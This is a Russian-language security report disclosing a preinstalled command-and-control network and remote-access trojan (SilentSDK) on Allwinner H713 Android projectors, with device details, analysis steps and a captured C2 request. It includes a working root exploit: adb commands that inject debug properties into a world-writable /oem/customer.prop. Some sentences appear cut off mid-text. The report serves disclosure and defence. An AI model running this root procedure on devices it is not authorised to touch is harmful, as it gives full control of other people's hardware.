
Разбор C2-сети китайских beamers — SilentSDK-Analysis
Технический отчет — Исследование безопасности
Затронутые устройства: Множество Android-проекторов брендов, таких как Nonete (например, модель HY260Pro) (вероятно, также несколько проекторов от Magcubic, Hotack, Huyukang и многих других, так как эти компании распространяют похожие модели, и есть подтверждающие признаки)
Платформа чипсета: Allwinner H713 / sun50iw12p1 — потенциально затрагивает все устройства на этой платформе
Период анализа: 11–17 апреля 2026 г.
Классификация: Предустановленная Command-and-Control инфраструктура с нагрузкой Remote Access Trojan
api.pixelpioneerss.com), извлекает конфиденциальные идентификаторы устройств и может в любой момент загружать и выполнять любой дополнительный вредоносный код с привилегиями root (chmod 777). Кроме того, на устройствах присутствуют открытые бэкдоры root.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) должны быть заблокированы на сетевом уровне. Пострадавшие пользователи могут только отключить вредоносные приложения вручную через ADB, поскольку они глубоко встроены в систему.Вредоносная инфраструктура, описанная в этом отчете, предустановлена на Android-проекторах, которые в настоящее время продаются в больших количествах конечным потребителям на Amazon, eBay и AliExpress. Затронутые устройства могут относиться к нескольким брендам (Hotack, Huyukang, Magcubic, Nonete и др.). Идентичная C2-инфраструктура независимо подтверждена на других устройствах того же производителя (см. раздел 13). Характер совпадает с случаями BADBOX.
Приобретенное устройство: Ссылка на Amazon - Nonete Mini Beamer 4K 1080P
| Свойство | Значение |
|---|---|
| Бренд | Nonete HY260Pro (модель, продаваемая несколькими компаниями) |
| Внутреннее имя модели | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Операционная система | SpectraOS (Android 11, Kernel 5.4.99) |
| Реальный Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Подмененный Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (без принудительного применения) |
| Ключ подписи платформы | Публичный AOSP Test Key |
| OEM-сертификат | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Прошивка | HY260Pro_SpectraOS_TPYB |
Примечание о масштабе: Чипсет Allwinner H713 встроен во множество дешевых Android-проекторов, продаваемых под сменяющимися брендами на европейском рынке. Идентичная база прошивки (h713_tuna_p3) и идентичный C2-оператор (Shenzhen Aodin Technology) убедительно свидетельствуют о том, что все устройства этого OEM-производителя содержат одну и ту же инфраструктуру.
| Шаг | Действие | Результат |
|---|---|---|
| 1 | Захват трафика Wireshark | HTTP-трафик на store-api.aodintech.com |
| 2 | Декодирование сжатого gzip ответа C2 | 7 приложений, включая скрытое «SilentTools» |
| 3 | AES-CBC дешифрование пути загрузки | Ключ [REDACTED], URL к .bpp файлу |
| 4 | Root-эксплойт через /oem/customer.prop | uid=0(root) после инъекции свойств |
| 5 | Криминалистический дамп /data, /oem, /system | APK, базы данных, конфигурации |
| 6 | Статический анализ DEX StoreOS | pm install -r -d, защита от реверс-инжиниринга |
| 7 | Обратное проектирование механизма reverseLen | Понимание защиты от анализа |
| 8 | Взлом защиты от реверс-инжиниринга | Расшифрованный, анализируемый DEX SilentSDK |
| 9 | XOR-дешифрование строк SilentSDK | Домен C2 api.pixelpioneerss.com подтвержден |
| 10 | Проверка хеша из трех источников | MD5/SHA-256 полностью совпадают |
| 11 | Обратное проектирование процесса загрузки вредоносного ПО | Серверы все еще активны |
| 12 | Обратное проектирование вредоносного ПО | Плагинный RAT-фреймворк |
Root-доступ был получен через комбинацию трех уязвимостей:
/oem доступен для записи всем — Раздел смонтирован как FAT с fmask=0000.customer.prop загружается при загрузке — Перезаписывает системные свойства.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Воздействие:** Любой пользователь, имеющий физический доступ, или злоумышленник в той же сети (через ADB, порт 5555 открыт, без аутентификации) получает полный root-доступ.
---
## 4. Ответ C2-сервера — Основные доказательства
### Захваченный HTTP-запрос```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
Сжатый gzip ответ содержит JSON список из семи приложений. Шесть из них — обычные стриминговые приложения (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). Седьмое — SilentTools:
| Приложение | Пакет | isShow | isForce | isSilent Install | isSilent Uninstall | Тип запуска |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |